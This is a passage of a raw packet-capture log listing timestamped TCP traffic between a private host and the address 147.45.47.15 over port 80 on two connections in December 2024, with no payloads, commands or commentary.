                                                                                                  Dec 19, 2024 08:52:42.215948105 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:42.215960979 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:42.216063023 CET4970480192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:42.216352940 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:42.216365099 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:42.216377974 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:42.216437101 CET4970480192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:42.216459036 CET4970480192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:42.251663923 CET4970480192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:42.371234894 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:42.649183035 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:42.649295092 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:42.649310112 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:42.649349928 CET4970480192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:42.649708033 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:42.649760008 CET4970480192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:42.657510996 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:42.657645941 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:42.657704115 CET4970480192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:42.665899038 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:42.668410063 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:42.668518066 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:42.668684006 CET4970480192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:42.676811934 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:42.676944971 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:42.677067995 CET4970480192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:42.685170889 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:42.685420036 CET4970480192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:42.734246969 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:42.734325886 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:42.734493971 CET4970480192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:42.738358021 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:42.738467932 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:42.738543987 CET4970480192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:42.769064903 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:42.769172907 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:42.769370079 CET4970480192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:42.841413975 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:42.841425896 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:42.841543913 CET4970480192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:42.843658924 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:42.843769073 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:42.848114014 CET4970480192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:42.852085114 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:42.852195978 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:42.857330084 CET4970480192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:42.860450029 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:42.860770941 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:42.860855103 CET4970480192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:42.868895054 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:42.869025946 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:42.869415045 CET4970480192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:42.877588034 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:42.877635956 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:42.877885103 CET4970480192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:42.885613918 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:42.885720968 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:42.885827065 CET4970480192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:42.893963099 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:42.894052029 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:42.894128084 CET4970480192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:42.902421951 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:42.902487993 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:42.902570963 CET4970480192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:42.912801027 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:42.912965059 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:42.913045883 CET4970480192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:42.917979956 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:42.918328047 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:42.918411016 CET4970480192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:42.921225071 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:42.921289921 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:42.921349049 CET4970480192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:42.926304102 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:42.926359892 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:42.926789045 CET4970480192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:42.929790974 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:42.929888964 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:42.929949999 CET4970480192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:42.935096025 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:42.935188055 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:42.935276985 CET4970480192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:42.940304995 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:42.940407038 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:42.940545082 CET4970480192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:42.948718071 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:42.970072985 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:42.970139027 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:42.970156908 CET4970480192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:42.972609043 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:42.972691059 CET4970480192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:43.033561945 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.033636093 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.033737898 CET4970480192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:43.036329985 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.036875963 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.036983013 CET4970480192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:43.037578106 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.041810989 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.041896105 CET4970480192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:43.041968107 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.046919107 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.046987057 CET4970480192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:43.047350883 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.051803112 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.051857948 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.051934004 CET4970480192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:43.056169987 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.056277037 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.056283951 CET4970480192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:43.062800884 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.062814951 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.062886953 CET4970480192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:43.064582109 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.064651966 CET4970480192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:43.064763069 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.068550110 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.068562984 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.068648100 CET4970480192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:43.072046995 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.072115898 CET4970480192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:43.072170019 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.075840950 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.075917006 CET4970480192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:43.075937986 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.079540968 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.079644918 CET4970480192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:43.079678059 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.083307981 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.083416939 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.083432913 CET4970480192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:43.087256908 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.087301970 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.087328911 CET4970480192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:43.091017962 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.091079950 CET4970480192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:43.091181040 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.094805002 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.094819069 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.094974995 CET4970480192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:43.098639011 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.098656893 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.098696947 CET4970480192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:43.101654053 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.101670027 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.101717949 CET4970480192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:43.104185104 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.104279041 CET4970480192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:43.104361057 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.106939077 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.107028961 CET4970480192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:43.107121944 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.153683901 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.153816938 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.153978109 CET4970480192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:43.155071020 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.155152082 CET4970480192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:43.155241966 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.157912016 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.158065081 CET4970480192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:43.163459063 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.163640976 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.163830996 CET4970480192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:43.164876938 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.164891005 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.165061951 CET4970480192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:43.166734934 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.166749001 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.166841030 CET4970480192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:43.225249052 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.225332975 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.225392103 CET4970480192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:43.226417065 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.226850033 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.226927996 CET4970480192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:43.226970911 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.229450941 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.229499102 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.229677916 CET4970480192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:43.231210947 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.231283903 CET4970480192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:43.231307983 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.233596087 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.233673096 CET4970480192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:43.233674049 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.235944033 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.235990047 CET4970480192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:43.236069918 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.238269091 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.238322973 CET4970480192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:43.238373995 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.240623951 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.240677118 CET4970480192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:43.240712881 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.242969036 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.243047953 CET4970480192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:43.243083000 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.245409966 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.245476961 CET4970480192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:43.245544910 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.247668028 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.247739077 CET4970480192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:43.247762918 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.250022888 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.250107050 CET4970480192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:43.250155926 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.252407074 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.252523899 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.252530098 CET4970480192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:43.254719019 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.254779100 CET4970480192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:43.254818916 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.257076979 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.257230997 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.257263899 CET4970480192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:43.259438038 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.259514093 CET4970480192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:43.259589911 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.261781931 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.261850119 CET4970480192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:43.261889935 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.264122963 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.264230967 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.264242887 CET4970480192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:43.266460896 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.266513109 CET4970480192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:43.266547918 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.268838882 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.268917084 CET4970480192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:43.268938065 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.271156073 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.271243095 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.271317005 CET4970480192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:43.273497105 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.273586988 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.273601055 CET4970480192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:43.275891066 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.275985003 CET4970480192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:43.276062965 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.278237104 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.278312922 CET4970480192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:43.278328896 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.280330896 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.280430079 CET4970480192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:43.280471087 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.282356977 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.282443047 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.282464027 CET4970480192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:43.284389973 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.284440041 CET4970480192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:43.284470081 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.286298037 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.286413908 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.286487103 CET4970480192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:43.288290977 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.288355112 CET4970480192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:43.288439989 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.290307045 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.290358067 CET4970480192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:43.290426016 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.292208910 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.292300940 CET4970480192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:43.292315960 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.294105053 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.294162035 CET4970480192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:43.294261932 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.296154022 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.296180010 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.296322107 CET4970480192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:43.297902107 CET8049704147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:43.297995090 CET4970480192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:43.341366053 CET4970480192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:43.661676884 CET4970480192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:53.057322025 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:53.176788092 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:53.176922083 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:53.206274986 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:53.325773001 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:54.428613901 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:54.428690910 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:54.428724051 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:54.428807020 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:54.428843021 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:54.428858995 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:54.428919077 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:54.429193974 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:54.429229021 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:54.429282904 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:54.429573059 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:54.429606915 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:54.429630995 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:54.429642916 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:54.430469990 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:54.548631907 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:54.548683882 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:54.548796892 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:54.620696068 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:54.620790005 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:54.620892048 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:54.624836922 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:54.624917030 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:54.624995947 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:54.633053064 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:54.636107922 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:54.636188984 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:54.636217117 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:54.644545078 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:54.644618988 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:54.644699097 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:54.652971029 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:54.653019905 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:54.653033018 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:54.661212921 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:54.661282063 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:54.661287069 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:54.669585943 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:54.669648886 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:54.669658899 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:54.677993059 CET8049705147.45.47.15192.168.2.5
